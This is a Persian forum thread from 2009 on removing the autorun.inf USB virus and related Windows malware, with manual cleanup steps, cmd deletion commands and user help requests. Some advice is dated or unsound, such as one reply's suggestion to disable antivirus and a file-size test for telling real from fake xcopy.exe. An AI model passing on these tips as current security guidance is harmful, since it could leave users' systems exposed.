خوشبختانه نسخه های جدید انتی ویروس های NOD32 و کسپراسکای این ویروس را تشخیص داده و به راحتی ان را از بین می برند . کافی است شما یکی از این دو انتی ویروس را روی سیستم نصب کرده و ان را به طور کامل اپدیت کنید و سپس سیستم را به طور کامل ویروس یابی کنید .

پس شرط از بین بردن این ویروس توسط انتی ویروس ها اپدیت کردن کامل انهاست . از بین این دو انتی ویروس در حال حاضر NOD32 عمل کرد بهتری دارد .



روشهای دستی برای از بین بردن این ویروس

این روشها هم برای فلش مموری ها و هم برای درایوها صادق می باشد .

روش اول :

برای از بین بردن این ویروس شما نباید به هیچ عنوان روی درایو یا فولدری دابل کلیک کنید . چون این ویروس با دابل کلیک کردن روی درایو ها فعال می شود .

پس اولین کار این است که شما وقتی سیستم را روشن کردید به هیچ عنوان روی درایوی دابل کلیک نکنید .
قبل از انجام مراحل زیر شما باید حتما با یکی از انتی ویروسهای NOD32 یا کسپراسکای و Avast سیستم را به طور کامل ویروس یابی کرده باشید . تا ابتدا ویروسهای احتمالی از سیستم شما پاکسازی شود .

دلیل این که چرا باید قبل از پاکسازی ویروس اتوران به طور دستی باید از انتی ویروس های گفته شده استفاده کرد را در روش دوم توضیح داده شده است .

ابتدا فلش مموری را به کامپیوتر وصل کنید . و سپس منتظر بمانید تا درایو مربوط به ان در my computer ظاهر شود . بعد از ظاهر شدن درایو مربوط به فلش مموری دیگر روی هیچ یک از درایو های کامپیوتر و حتی فلش مموری دابل کلیک نکنید .

حالا مراحل زیر را ابتدا انجام دهید .

ابتدا وارد My Computer شوید .
بعد از مشاهده لیست درایوها از نوار بالا بروی گزینه Tools کلیک کرده سپس گزینه Folder Options را انتخاب کنید
راهنمایی : اگر Folder Options شما وجود ندارد و ممکن است پاک شده باشد در زیر برنامه هایی برای برگرداندن ان معرفی کرده ام .

در پنجره جدید باز شده گزینه View را انتخاب کنید و بروی گزینه Show hidden files and folders کلیک کنید تا دایره آن توپر شود .
کمی پایینتر تیک گزینه Hide Protected Operationg System Files را بر دارید . حالا ok کنید

از این به بعد تا پاک سازی کامل این ویروس از داخل درایو ها روی هیچ کدام از درایو ها نباید دابل کلیک کرد بلکه باید با راست کلیک روی درایو و زدن open وارد درایو شوید .

(حتما یادتون باشه با راست کلیک کردن و زدن open وارد درایو هایتان شوید اگر دوبار روی درایوی کلیک کنید باز هم ویروس فعال خواهد شد و دوباره همه چیز به حالت اول بر خواهد گشت . پس حتما با راست کلیک کردن و زدن open وارد درایوهایتان شوید)

ابتدا با راست کلیک روی درایو C و زدن OPEN وارد ان شوید و فایلی به نام autorun.inf را از داخل درایو هایتان پاک کنید . سپس با راست کلیک و زدن open وارد درایو های دیگر شوید و همچین فایلی را از داخل همه درایو ها پیدا کرده و پاک کنید .

بعد از این که شما همه فایلهای autorun.inf را از داخل همه درایو ها پاک کردید باید بلافاصله بدون انجام هیچ کار اضافی ( حتی نباید جایی کلیک کنید ) سیستم را Reset کنید .

حتما باید سیستم بلافاصله ریست شود .

فرض می کنیم فلش مموری یا RAM مربوط به موبایل شما نیز به این ویروس مبتلا شده باشد .

شما باید فلش مموری یا موبایل خودتون را به کامپیوتر متصل کنید و بعد از دیدن درایو مربوط به ان با راست کلیک و زدن open وارد ان شوید و فایلی به نام autorun.inf را از داخل ان پاک کنید و همین طور که فلش مموری یا موبایل شما به کامپیوتر متصل است سیستم را Reset کنید .

این اموزش مربوط به ویروس autorun.inf بود . اما همیشه این ویروس به تنهایی در درایو های شما قرار نمی گیرد بلکه ممکن است همراه خود چندین فایل exe نیز داشته باشد که اگر شما کامل مقاله را مطالعه فرمایید اسم انها گفته شده است که شما در حین پاک کردن ویروس autorun.inf باید انها را نیز همراه این ویروس از داخل درایو ها پاک کنید .


++++++++++++++++++++++++++++++++++

روش دوم :

برای این که متوجه شوید کامپیوتر شما به ویروس autorun.inf مبتلا شده است یا نه ، باید ابتدا فایلهای مخفی و سوپرهایدن را قابل روئیت کنید .

چون این ویروس به صورت مخفی و سیستمی می باشد .

برای این که فایلهای مخفی را بتوانید ببینید از روش اول برای از بین بردن autorun.inf استفاده کنید . اما گاهی اوقات به دلیل دچار شدن به یک ویروس دیگر شما قادر به دیدن فایلهای مخفی نیستید .
برای این کار کافی است مسیر زیر را دنبال کنید .

Start->Run->cmd.exe

سپس در محیط cmd به root درایو ها رفته ( برای رفتن به ریشه یک درایو باید از دستور cd\ استفاده کنید ) و عبارت dir /ah را تایپ کنید با این کار تمامی فایلهای و فایلهای مخفی درایو به شما نشان داده خواهد شد . که شما با این روش می تونید ببینید که ایا کامپیوتر شما به ویروس autorun.inf مبتلا شده است یا نه .

یک روش برای از بین بردن ویروس autorun.inf استفاده از همین محیط cmd می باشد . که شما باید با استفاده از دستورات داس به root درایو ها رفته و با استفاده از دستور del /a/f autorun.inf این ویروس را از تمامی درایو ها خود پاک کنید . توجه کنید که ابتدا باید درایو c را پاک کرده و بعد بقیه درایو ها را پاک کنید . بعد از این کار بلافاصله کامپیوتر را ریستارت کنید .


([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])


([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])



گاهی اوقات بعد از این که شما به طور دستی اقدام به پاکسازی ویروس اتوران می کنید بعد از چند ثانیه این ویروس دوباره سر جای خود برمی گردد .

این مشکل به این دلیل است که جدیدا ویروس اتوران پیشرفت زیادی کرده و به تنهایی فقط شامل یک فایل notpad به اسم autorun.inf نیست بلکه همراه این فایل چند فایل exe نیز وجود دارد که به این فایل ضمیمه شده اند که نشان از پشرفت این ویروس داشته است .

چند تا از فایلهای exe که اخیرا همراه این ویروس در درایو ها ایجاد می شود و مانع از پاکسازی ویروس اتوران به طور دستی می شود فایلهایی به اسم 3o.exe و sxs.exe و semo2x.exe و system.exe و m88coaim.exe می باشد .

متاسفانه فایل های exe را نمی توان به طور دستی پاک کرد به خاطر این که بعد از پاک شدن سریعا در عرض چند ثاینه یک جایگزین برای خود درست می کنند .

پس برای این که بتوانید به راحتی و به طور دستی ویروس اتوران را پاک کنید باید ابتدا فایهای exe ضمیمه ان را از بین ببریم برای این کار من انتی ویروس Avast را پیشنهاد می کنم که قادر به از بین بردن برنامه های exe ضمیمه شده به ویروس اتوران است مخصوصا فایل 3o.exe . بعد از ان شما به راحتی می توانید به طور دستی فایل autorun.inf را از درایوها پاک کنید .

پس شرط از بین بردن ویروس اتوران به طور دستی این است که شما قبل از ان با انتی ویروس Avast سیستم را به طور کامل ویروس یابی کنید تا برنامه های exe همراه ویروس اتوران از بین بروند .

++++++++++++++++++++++++++++++++++

روش سوم :

این روش شاید دیگر به این راحتی ها جواب ندهد به این دلیل که ویروس اتوران پیشرفت کرده و دیگر به تنهایی فقط شامل یه فایل notpad نیست بلکه همراه خود چندین فایل exe نیز دارد . اما گفتن این روش هم خالی از لطف نیست .
یک روش هم برای از بین بردن ویروس اتوران این است که برنامه notpad را باز کنید و دستور زیر را در ان کپی کنید و سپس با نام و پسوند autorun.inf ذخیره کنید .

کد:
[AutoRun]open=explorer.exep
سپس به مسیر tools->folder options->view رفته و تیک گزینه hide extensions for known file types را بردارید تا پسوند فایلهای نیز نمایان شود .

سپس فایلهای مخفی و سوپرهایدن را قابل روئیت کنید و فایل autorun.inf خود را در همه درایو ها کپی کنید با این کار اگر فایل اتوارن دیگری در درایو شما باشد اخطاری مبنی بر جایگزین کردن فایل به شما داده خواهد شد که شما با زدن گزینه yes پیغام را تائید کنید .

این کار را برای تمام درایو ها انجام دهید . با این کار فایل اتوران شما جایگزین ویروس اتوران خواهد شد .
همان طور که گفتم شاید این روش دیگر جواب ندهد .


+++++++++++++++++++++++++++++++

روش چهارم :

copy.exe تروجانی است که گاهی اوقات در تمامی درایو های شما قرار میگیره و با هر بار کلیک بر روی درایو ها فایل autorun.inf فایل این فایل را اجرا می کنه .

یکی از روشهای پاک کردن این ویروس این است که ابتدا شما باید پروسه های temp1.exe و temp2.exe رو از بین ببرید . برای این کار ابتدا باید سیستم را به صورت safe mode راه اندازی کنید .

شما نباید روی درایو ها یتان دابل کلیک کنید چون با این کار ویروس autorun.inf که در درایو هایتان قرار دارد باعث فعال شدن پروسه های temp1.exe و temp2.exe می شود .

بعد از راه اندازی سیستم به صورت safe mode شما باید با راست کلیک کردن و زدن گزینه open وارد درایو c ویندوز شده و به پوشه windows و بعد هم پوشه system32 رفته و دو فایل temp1.exe و temp2.exe را حذف کنید .

البته در بعضی از نسخه های ویروس copy.exe ویروس autorun.inf حتی درون پوشه %win% هم وجود داره بنابراین حتما حتما برای ورود به درایوها پوشه ها را با راست کلیک باز کنید .

نکته : قبل از اینکار باید ابتدا این پروسه ها را از Task Manager پاک کنید . برای این کار با زدن کلید های ترکیبی ctrl + alt + delete وارد Task Manager بشید و پروسه های temp1.exe و temp2.exe را از لیست processes با کلیک بر روی انها و زدن end process حذف کنید .

ویروس autorun.inf با هر بار فعال شدن موجب میشه که دو فایل xcopy.exe و host.exe درون همون درایو فعال بشن و دوباره دو فایل temp1.exe و temp2.exe رو بسازن.

شما نباید فایل های xcopy.exe را با فایل های خود windows که درون پوشه ی system32 هستند اشتباه بگیرید .

برای تشخیص ویروس xcopy.exe و فایل xcopy.exe که در پوشه system32 است باید از حجم انها این دو را شناسایی کرد اگر فایل xcopy.exe حجمی معادل 32 کیلو بایت داشت مربوط به خود ویندوز می باشد در غیر این صورت ویروس خواهد بود .

حالا فایلهای سیستمی را مانند ورش اول از حالت هایدن خارج کنید و ویروس autorun.inf را پاک کنید و بعد هم به درایوهای خودتون نگاه کنید اگر فایلهایی با عنوان xcopy.exe و host.exe بودند با خیال راحت پاک کنید .

برای از بین بردن ویروس autorun.inf از برنامه ای که بدین منظور ایجاد شده است نیز می توانید استفاده کنید .

برنامه به صورت فشرده شده میباشد ابتدا ان را از حالت فشرده خارج سازید و برنامه را اجرا کنید و سپس گزینه scan را بزنید تا شروع به پاک سازی این ویروس از درایو ها شما کند .

اگر فلش مموری یا موبایل شما نیز دچار این ویروس شده است ان را به کامپیوتر متصل نمایید و سپس این برنامه را اجرا کنید تا این ویروس را از داخل usb درایوهای شما نیز پاک سازی نماید .


برنامه هایی برای از بین بردن ویروس اتوران





[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

urc
29-03-2009, 13:53
اگه روش رو خوندی حد اقل بگو به کارت اومد یا نه

ahmad gh
31-03-2009, 13:04
کامپیوتر یکی از دوستان من ویروسی گرفته که نمیزاره هیچ کدوم از درایوها باز بشه یعنی از طریق مای کامپیوتر کلیک میکنی وارد نمیشه ؟ و از طریق فولدرز که در بالا کنار ویو است میشه وارد درایو ها شد و پیغامی میده به این مزمون که داخل کنترل پنل فولدر اپشن یادم نیست دقیقا اسوکیشن یه همچین چیزی ایجاد کنید ایا راهکاری هست از شرش خلاص شد
ویندوز رو هم عوض میکنیم فقط درایو سی ـ(ویندوز) درست میشه و بقیه درایو ها همون طور هست

SajjadKAZ2003
31-03-2009, 15:18
اگه روش رو خوندی حد اقل بگو به کارت اومد یا نه

بی فایده بود
اسم تروجانی که من گرفتارش شدم اینه : Win32.Worm.Conficker.B.3
ربطی به اتوران و این چیزا هم نداره
کارش هم اینه که فایل : jwgkvsq.vmx رو توی USB درست می کنه
اینجا هم یه توضیحاتی نوشته شده:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
به هر حال با عوض کردن ویندوز مشکلم حل شد

ولی این دفعه بعد از چند دقیقه که تو ویندوز کار می کنم با این پیغام مواجه میشم:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

و بعدش هم کارت صدا از کار میوفته :
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

احتمالا این هم یه ویروسه ، برای از بین بردن این مشکل چی کار میشه کرد؟

rezaete
01-04-2009, 14:41
قسمت show hidden کامپیوترم کار نمیکنه و نمیتونم فایلهای مخفی شده رو ببینم. توی توضیحات پست اول، بعد از تیتر show hidden در مورد ویروس autorun نوشته شده. باید چکار کنم؟

omid-p30
01-04-2009, 15:20
قسمت show hidden کامپیوترم کار نمیکنه و نمیتونم فایلهای مخفی شده رو ببینم. توی توضیحات پست اول، بعد از تیتر show hidden در مورد ویروس autorun نوشته شده. باید چکار کنم؟

در قسمت راههای دستی از بین بردن ویروسی که show hidden files را غیر فعال میکند 3 راه حل هست که طبق همون ها عمل کنید.

rezaete
01-04-2009, 18:24
در قسمت راههای دستی از بین بردن ویروسی که show hidden files را غیر فعال میکند 3 راه حل هست که طبق همون ها عمل کنید.

مرسی امید جان . ولی خود ویروس چی میشه؟ اونو نمیخواد از بین ببرم؟ چطور باید این کارو کنم؟

omid-p30
01-04-2009, 18:35
مرسی امید جان . ولی خود ویروس چی میشه؟ اونو نمیخواد از بین ببرم؟ چطور باید این کارو کنم؟

برنامه autorun virus remover رو از تاپیک زیر دریافت کن.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

kar1591
01-04-2009, 19:56
سلام به همگی

آقا منم یه مشکل دارم
هر وقت USB یا رم ریدر به کامپیوتر وصل میکنم یه ارور میده smss.exe هیچ کاری هم نمی تونم بکنم ویندوز هم عوض کردم ولی پاک نشد AVG و nod هم پاک نمیکنه[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

rezaete
01-04-2009, 20:45
برنامه autorun virus remover رو از تاپیک زیر دریافت کن.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

مرسی امید جان . چک میکنم ...


سلام به همگی

آقا منم یه مشکل دارم
هر وقت USB یا رم ریدر به کامپیوتر وصل میکنم یه ارور میده smss.exe هیچ کاری هم نمی تونم بکنم ویندوز هم عوض کردم ولی پاک نشد AVG و nod هم پاک نمیکنه[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
به این تاپیک برید :
ویروس smss.exe

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

Amir Hossein
01-04-2009, 22:05
سلام ترو خدا كمك كنيد همين الان دارم هول هول مينويسم ممكنه مرورگرم قرنطينه
يه ويروس اومده كه كسپر 2009 هم نميشناسه فقط قرنطينه ميكنه همه برنامه هامو داره قرنطينه ميكنه چه كار كنم
از هر كسي كه انلاينه عاجزانه طلب كمك ميكنم
:2::2::2::2:
هر جور بلدين كمكم كنين
اينجوري فايلهارو يكي يكي قرنطينه ميكنه
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
ويروسش هم كه win32 هست

sayan_se666
02-04-2009, 12:23
از کاربران اگر کسی گرفتار هر گونه ویروس شده بگه تا راهپاک کردنش را بگذارم
urc

من بشتر مواقع كه به اينترنت وصل مي شوم فايلهاي exe با نام هاي مختلف مثلbiz يا niz وغيره وارد درايو c ميشود و باعث اختلال در سيستم مي شود

mahdi7610
02-04-2009, 19:47
بی فایده بود
اسم تروجانی که من گرفتارش شدم اینه : Win32.Worm.Conficker.B.3
ربطی به اتوران و این چیزا هم نداره
کارش هم اینه که فایل : jwgkvsq.vmx رو توی USB درست می کنه
اینجا هم یه توضیحاتی نوشته شده:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
به هر حال با عوض کردن ویندوز مشکلم حل شد

ولی این دفعه بعد از چند دقیقه که تو ویندوز کار می کنم با این پیغام مواجه میشم:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

و بعدش هم کارت صدا از کار میوفته :
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

احتمالا این هم یه ویروسه ، برای از بین بردن این مشکل چی کار میشه کرد؟
سلام

بارها مطرح شده

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

یه برنامه برای بستن پرتها اینجا گذاشتم این را هم استفاده کنید

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

موفق باشید

Diff
03-04-2009, 14:15
توی پست اول تاپیک ، تو روش اول وصل کردن هر نوع فلش مموری فرقی نداره ؟ یا باید فلشی باشه که احتمال میدیم ویروس از اون بوده ؟

وقتی تیک hide protected operating system files رو برمیداریم ، بعد از اینکه کل مراحل انجام شد کارمون تموم شد دوباره باید تیک بزنیم دیگه ؟

omid-p30
03-04-2009, 14:35
توی پست اول تاپیک ، تو روش اول وصل کردن هر نوع فلش مموری فرقی نداره ؟ یا باید فلشی باشه که احتمال میدیم ویروس از اون بوده ؟

وقتی تیک hide protected operating system files رو برمیداریم ، بعد از اینکه کل مراحل انجام شد کارمون تموم شد دوباره باید تیک بزنیم دیگه ؟

بله برای امنیت کامل، درایو فلش مموری رو هم چک کنید چون نمیتونید صد در صد مطمین باشید که ویروس از فلش نیومده باشه.

بله اون قسمت رو هم بعد از اتمام عملیات به حالت پیش فرض در بیارید.

mad142
05-04-2009, 15:42
thenxxxx>>>>>>>>

wood56
05-04-2009, 18:03
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

ا سلام
چرا این با اینکه سیستم من قادر به Show کردن فایلهای Hidden می باشد اما تیک دو گزینه ای که با رنگ قرمز مشخص شده است پس از برداشتن مجدداً به حالت اول برمی گردد و قادر نخواهد بود پسوند فایلها را نمایش دهد؟
(آنتی ویروس من Nod32 و آپدیت می باشد و سیستم من به Autorun info آلوده نیست)
چگونه میتوان این دوگزینه را مجددا فعال نمود؟

omid-p30
05-04-2009, 19:30
ا سلام
چرا این با اینکه سیستم من قادر به show کردن فایلهای hidden می باشد اما تیک دو گزینه ای که با رنگ قرمز مشخص شده است پس از برداشتن مجدداً به حالت اول برمی گردد و قادر نخواهد بود پسوند فایلها را نمایش دهد؟
(آنتی ویروس من nod32 و آپدیت می باشد و سیستم من به autorun info آلوده نیست)
چگونه میتوان این دوگزینه را مجددا فعال نمود؟

اشکال از تروجانی که در پست اول بود نبود ؟

mehr film
05-04-2009, 20:24
دوستان خواهش میکنم کمک کنید ...

الان وقتی روی 2 تا از درایو ها کلیک میکنم Access is Denied میزنه و بقیه ی درایو ها هم پنجره ی open with باز میشه
اون مراحلی رو که در صفحه ی اول بود خوندم ولی وقتی روی درایو راست کلیک میکنم و open رو میزنم باز هم پنجره ی open with میاد ... مگه اینکه توی Run بنویسم :H یا :F تا وارد درایو بشه
وقتی هم وارد درایو میشم اصلا فایلی به اسم Autorun.inf نیست ... فایل ها رو هم در حالت show hidden گذاشتم
کاسپر اسکای اینترنت سکیوریتی 7 آپدیت هم نصبه

mahdi7610
05-04-2009, 21:00
دوستان خواهش میکنم کمک کنید ...

الان وقتی روی 2 تا از درایو ها کلیک میکنم Access is Denied میزنه و بقیه ی درایو ها هم پنجره ی open with باز میشه
اون مراحلی رو که در صفحه ی اول بود خوندم ولی وقتی روی درایو راست کلیک میکنم و open رو میزنم باز هم پنجره ی open with میاد ... مگه اینکه توی Run بنویسم :H یا :F تا وارد درایو بشه
وقتی هم وارد درایو میشم اصلا فایلی به اسم Autorun.inf نیست ... فایل ها رو هم در حالت show hidden گذاشتم
کاسپر اسکای اینترنت سکیوریتی 7 آپدیت هم نصبه
سلام

توی صفحه اول همین تاپیک یه برنامه به نام Flash_Disinfector برای حل مشکل open with درایوها معرفی کردم . اون برنامه را بگیر و اجرا کن تا مشکلت را حل کنه .

برای حل مشکل Access is Denied هم بارها پاسخ داده ام . مربوط به تغییر مالکیت درایوها می باشد .

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

موفق باشید:)

k.rajaee
06-04-2009, 10:01
با عرض سلام خدمت آقا مهدی
کامپیوتر من به ویروسی آلوده شده که تمام فولدرها رو به فایل exe با حجم 65 کیلوبایت تبدیل می کنه می خواستم ببینم اونم همین ویروس new folder هست یا چیز دیگه ایه؟
اگه راهنممایی کنیک خیلی خیلی ممنون میشم!

mehr film
06-04-2009, 14:02
سلام

توی صفحه اول همین تاپیک یه برنامه به نام flash_disinfector برای حل مشکل open with درایوها معرفی کردم . اون برنامه را بگیر و اجرا کن تا مشکلت را حل کنه .

برای حل مشکل access is denied هم بارها پاسخ داده ام . مربوط به تغییر مالکیت درایوها می باشد .

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

موفق باشید:)
ممنون دوست عزیز مشکلم حل شد :11::11::11:

issauni
06-04-2009, 22:38
با سلام،
تازگيها حواسم نبود و Nod 32 لايسنسش تموم شد.
كامپيوترم ويروسي گرفته كه دائما" هارد ديسك پر ميشه.
گشتم و ديدم ظاهرا" اسم ويروس Sircam

در ضمن هيچ دكمه اي هم توي فاير فاكس كار نميكنه يعني نه جستجو مي تونم بكنم و نه لاگين.

راه حل چيه ؟

ممنونم

wood56
07-04-2009, 11:00
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام
چرا این با اینکه سیستم من قادر به show کردن فایلهای hidden می باشد اما تیک دو گزینه ای که با رنگ قرمز مشخص شده است پس از برداشتن مجدداً به حالت اول برمی گردد و قادر نخواهد بود پسوند فایلها را نمایش دهد؟
(آنتی ویروس من nod32 و آپدیت می باشد و سیستم من به autorun info آلوده نیست)
چگونه میتوان این دوگزینه را مجددا فعال نمود؟


با برنامه ای که در صفحه اول قرار دارد کار کردم ولی نتونستم مشکلم رو حل کنم.
کسی نمیدونه مشکلم و چطوری حل کنم؟

ejbaree
07-04-2009, 14:29
سلام.
آقا من یه مشکل عجیب با ویندوزم پیدا کردم. اونم اینه که نمیتونم Show hidden files and folders کنم.!قبلا میشدا. الان نمیشه.
چیکار باید کنم؟

omid-p30
07-04-2009, 14:56
سلام.
آقا من یه مشکل عجیب با ویندوزم پیدا کردم. اونم اینه که نمیتونم show hidden files and folders کنم.!قبلا میشدا. الان نمیشه.
چیکار باید کنم؟

پست اول رو بخونید.

Amir Hossein
07-04-2009, 23:57
سلام ترو خدا كمك كنيد همين الان دارم هول هول مينويسم ممكنه مرورگرم قرنطينه
يه ويروس اومده كه كسپر 2009 هم نميشناسه فقط قرنطينه ميكنه همه برنامه هامو داره قرنطينه ميكنه چه كار كنم
از هر كسي كه انلاينه عاجزانه طلب كمك ميكنم
:2::2::2::2:
هر جور بلدين كمكم كنين
اينجوري فايلهارو يكي يكي قرنطينه ميكنه
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
ويروسش هم كه win32 هست

اینجا که انگار هیچ کس بلد نیست کمک کنه

king emperor
08-04-2009, 01:46
بهتر آنتی ویروست رو غیر فعال کنی تا بعد ...

omid-p30
08-04-2009, 08:33
اینجا که انگار هیچ کس بلد نیست کمک کنه

یعنی همچنان تمام برنامه ها رو میفرسته قرنطینه ؟ کاسپر رو از حالت اتومات در بیار تا برای قرنطینه کردن سوال کنه، بعد از این پیغام سوال یک عکس بگذار که اسم و مشخصات کامل ویروس رو ببینیم چی هست. برای این هم که قرنطینه نکنه skip رو بزن.

rezaete
08-04-2009, 12:49
امید جان از طریق رجیستری هم عمل کردم اما مشکل show hidden حل نشد . کدوم یکی از برنامه های پست اول رو باید استفاده کنم؟ واسه فایل های هیدن شده که مشکلی پیش نمیاد؟مثلا پاک بشن...

omid-p30
08-04-2009, 14:05
امید جان از طریق رجیستری هم عمل کردم اما مشکل show hidden حل نشد . کدوم یکی از برنامه های پست اول رو باید استفاده کنم؟ واسه فایل های هیدن شده که مشکلی پیش نمیاد؟مثلا پاک بشن...

والا اطلاعی تو این زمینه ندارم. فقط خودم 2 بار اینطوری شده بودم که با اون روش ها از رجیستری حل شد. بقیه موارد گفته شده رو هم عمل کن. احتمالا خب مشکل آفرین نیستد که معرفی کردند. autorun virus remover هم برنامه معروفی هست.

amir_toos
08-04-2009, 21:00
هیچ کاری بهتر از عوض کردن ویندوز نیست!

mooein
09-04-2009, 22:54
در اين مقاله قصد دارم راه ها و برنامه هایی را برایتان معرفی کنم که بتوانيد از طريق اين راه ها گزينه ي Show Hidden Files رو که در قسمتFolder Option هست را اگر از کار افتاده است برطرف کنید .
) يعني شما تيک Show Hidden Files را ميزنيد ولي کار نمي کند و وقتي بر مي گرديد هنوز روي Do Not Show Hidden Files هست ! )
این مشکل به دلیل وجود ویروسهایی متعددی روی سیستم شما بوده است که با پاک شدن انها توسط انتی ویروس ها آثارشون باقي مانده .
همچنین راههایی برای از بین بردن انواع ویروس های کامپیوتری که اکثریت انها را انتی ویروس ها تشخیص نمی دهند .


حالا از کجاها بفهمیم که کامیپوتر ما ویروس گرفته است .

موقعي که شما وارد My Computer مي شويد و روي درايو هاي ان راست کليک مي کنيد و در اين هنگام يک گزينه با يک زبان نامفهوم مطابق عکسي که قرار داده ام را مي بينيد .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


یا اینکه وقتی روی درایوهایتان دوبار کلیک می کنید محتوای درایوهای شما در یک صفحه جدید باز می شود .
یا موقع دابل کلیک کردن روی درایو هایتان پنجره Open With باز می شود و به شما می گوید Choose the program you want to use to open this file


یا هنگام کلیک بر روی درایو هایتان error ی به شما داده می شود .


یعنی سیستم شما ویروسی شده است . این ویروس ، ویروس autorun.inf می باشد . نحوه پاک کردن این ویروس را در قسمت های بعد گفته شده است .


همچنين اين ويروس باعث از بين رفتن و پاک شدن Folder Options خواهد شد


و اگر شما گزينه هاي Show hidden files and folders و Hide protected operating system files (Recommended) را مارک دار کنيد با ok کردن پنجره اين گزينه کار نخواهند کرد و دوباره به حالت اوليه باز خواهند گشت .


همچنين اين ويروس باعث غير فعال شدن Task Manageو Registry Editor خواهد شد .




[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


اگر شما روي گزينه command prompt يا cmd نيز کليک کنيد يا باز نخواهد شد و پيغام زير را خواهد داد يا اينکه به سرعت باز و بسته خواهد شد .
the command prompt has been disabled by your administrator

راههاي ورود اين ويروس از طريق قطعاتي خواهد بود که از طريق usb با سيستم شما ارتباط دارند . قطعاتي مانند فلش مموري ها ( کولديسک ) ، موبايل ها ، رم ريدر ها و ...


نحوه از ببن بردن ویروس autorun.inf


مواقعی که شما وسایلی مانند USB, flash drive را به کامپیوتر وصل می کنید ویروس اتوران وارد سیستم شما می شود . به دلیل این که ویروس autorun.inf به صورت hidden و سیستمی می باشد به همین دلیل اکثر انتی ویروس ها قادر به شناسایی و از بین بردن این ویروس نیستند .

خوشبختانه نسخه های جدید انتی ویروس های NOD32 و کسپراسکای این ویروس را تشخیص داده و به راحتی ان را از بین می برند . کافی است شما یکی از این دو انتی ویروس را روی سیستم نصب کرده و ان را به طور کامل اپدیت کنید و سپس سیستم را به طور کامل ویروس یابی کنید .

پس شرط از بین بردن این ویروس توسط انتی ویروس ها اپدیت کردن کامل انهاست . از بین این دو انتی ویروس در حال حاضر NOD32 عمل کرد بهتری دارد .

روشهای دستی برای از بین بردن این ویروس

این روشها هم برای فلش مموری ها و هم برای درایوها صادق می باشد .

روش اول :

برای از بین بردن این ویروس شما نباید به هیچ عنوان روی درایو یا فولدری دابل کلیک کنید . چون این ویروس با دابل کلیک کردن روی درایو ها فعال می شود .

پس اولین کار این است که شما وقتی سیستم را روشن کردید به هیچ عنوان روی درایوی دابل کلیک نکنید .
قبل از انجام مراحل زیر شما باید حتما با یکی از انتی ویروسهای NOD32 یا کسپراسکای و Avast سیستم را به طور کامل ویروس یابی کرده باشید . تا ابتدا ویروسهای احتمالی از سیستم شما پاکسازی شود .

دلیل این که چرا باید قبل از پاکسازی ویروس اتوران به طور دستی باید از انتی ویروس های گفته شده استفاده کرد را در روش دوم توضیح داده شده است .

ابتدا فلش مموری را به کامپیوتر وصل کنید . و سپس منتظر بمانید تا درایو مربوط به ان در my computer ظاهر شود . بعد از ظاهر شدن درایو مربوط به فلش مموری دیگر روی هیچ یک از درایو های کامپیوتر و حتی فلش مموری دابل کلیک نکنید .

حالا مراحل زیر را ابتدا انجام دهید .

ابتدا وارد My Computer شوید .
بعد از مشاهده لیست درایوها از نوار بالا بروی گزینه Tools کلیک کرده سپس گزینه Folder Options را انتخاب کنید
راهنمایی : اگر Folder Options شما وجود ندارد و ممکن است پاک شده باشد در زیر برنامه هایی برای برگرداندن ان معرفی کرده ام .

در پنجره جدید باز شده گزینه View را انتخاب کنید و بروی گزینه Show hidden files and folders کلیک کنید تا دایره آن توپر شود .
کمی پایینتر تیک گزینه Hide Protected Operationg System Files را بر دارید . حالا ok کنید

از این به بعد تا پاک سازی کامل این ویروس از داخل درایو ها روی هیچ کدام از درایو ها نباید دابل کلیک کرد بلکه باید با راست کلیک روی درایو و زدن open وارد درایو شوید .

(حتما یادتون باشه با راست کلیک کردن و زدن open وارد درایو هایتان شوید اگر دوبار روی درایوی کلیک کنید باز هم ویروس فعال خواهد شد و دوباره همه چیز به حالت اول بر خواهد گشت . پس حتما با راست کلیک کردن و زدن open وارد درایوهایتان شوید)

